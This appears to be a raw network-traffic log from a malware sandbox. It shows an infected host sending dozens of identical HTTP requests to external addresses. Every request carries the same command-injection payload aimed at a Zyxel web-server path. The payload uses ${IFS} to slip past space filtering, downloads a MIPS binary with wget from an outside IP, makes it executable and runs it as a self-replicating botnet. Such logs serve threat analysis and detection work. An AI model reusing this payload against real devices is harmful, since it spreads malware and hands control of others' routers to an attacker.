                                                      Feb 2, 2024 06:36:10.005991936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8636192.168.2.145434244.58.21.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006023884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8637192.168.2.1433186217.156.9.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006081104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8638192.168.2.144434850.234.88.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006141901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8639192.168.2.145038245.228.138.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006160975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8640192.168.2.144690899.114.73.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006201982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8641192.168.2.144114681.85.221.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006237984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8642192.168.2.1440526207.108.116.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006267071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8643192.168.2.1454638124.46.7.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006302118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8644192.168.2.1442286209.16.18.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006366968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8645192.168.2.1449860206.212.115.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006428957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8646192.168.2.146073062.129.113.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006450891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8647192.168.2.1440518142.249.65.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006477118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8648192.168.2.1433714223.206.16.150443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006511927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8649192.168.2.1436414106.48.233.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006566048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8650192.168.2.144302465.61.46.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006592989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8651192.168.2.145892891.73.212.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006623983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8652192.168.2.143314040.180.120.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006656885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8653192.168.2.1441336189.185.125.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006709099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8654192.168.2.145730270.230.250.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006753922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8655192.168.2.1438336130.60.237.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006794930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8656192.168.2.143444650.92.179.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006854057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8657192.168.2.1438614117.246.249.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006889105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8658192.168.2.143444853.225.155.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006953001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8659192.168.2.144766899.13.58.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.006957054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8660192.168.2.1435422108.26.77.85443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007019997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8661192.168.2.14470001.4.135.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007060051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8662192.168.2.1446674150.103.151.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007121086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8663192.168.2.143900093.12.14.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007148027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8664192.168.2.1454454162.254.64.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007209063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8665192.168.2.1448444195.18.69.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007240057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8666192.168.2.1452128105.70.140.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007299900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8667192.168.2.1435860141.7.193.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007339954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8668192.168.2.143828469.40.157.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007371902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8669192.168.2.143429440.83.1.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007412910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8670192.168.2.1459578144.31.107.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007437944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8671192.168.2.14573062.12.96.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007491112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8672192.168.2.1445770222.109.75.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007539988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8673192.168.2.144745234.36.212.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007580996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8674192.168.2.144708483.35.160.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007642031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8675192.168.2.1438882155.218.34.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007673979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8676192.168.2.1457642185.20.178.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007707119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8677192.168.2.1442698159.124.127.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007754087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8678192.168.2.1441552163.61.104.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007786036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8679192.168.2.1457792115.175.193.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007836103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8680192.168.2.144179899.241.231.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007869959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8681192.168.2.1454130188.95.178.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007908106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8682192.168.2.144573446.180.0.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007931948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8683192.168.2.1433010180.52.188.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.007989883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8684192.168.2.1442220202.150.110.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.008044958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8685192.168.2.1456138195.25.172.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.008073092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8686192.168.2.1444568161.61.108.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.008116007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8687192.168.2.144606861.103.114.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.008147955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8688192.168.2.143370888.41.94.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.008191109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8689192.168.2.1441710194.207.34.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.008224010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8690192.168.2.1450492140.164.78.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012099028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8691192.168.2.144769249.15.181.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012135029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8692192.168.2.1447956180.178.211.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012187004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8693192.168.2.143863623.232.15.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012236118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8694192.168.2.1452400152.122.215.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012281895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8695192.168.2.1437260116.101.91.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012331963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8696192.168.2.14450984.139.117.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012363911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8697192.168.2.1447748130.192.233.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012418032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8698192.168.2.1451006129.4.167.26443
                                                      TimestampBytes transferredDirectionData
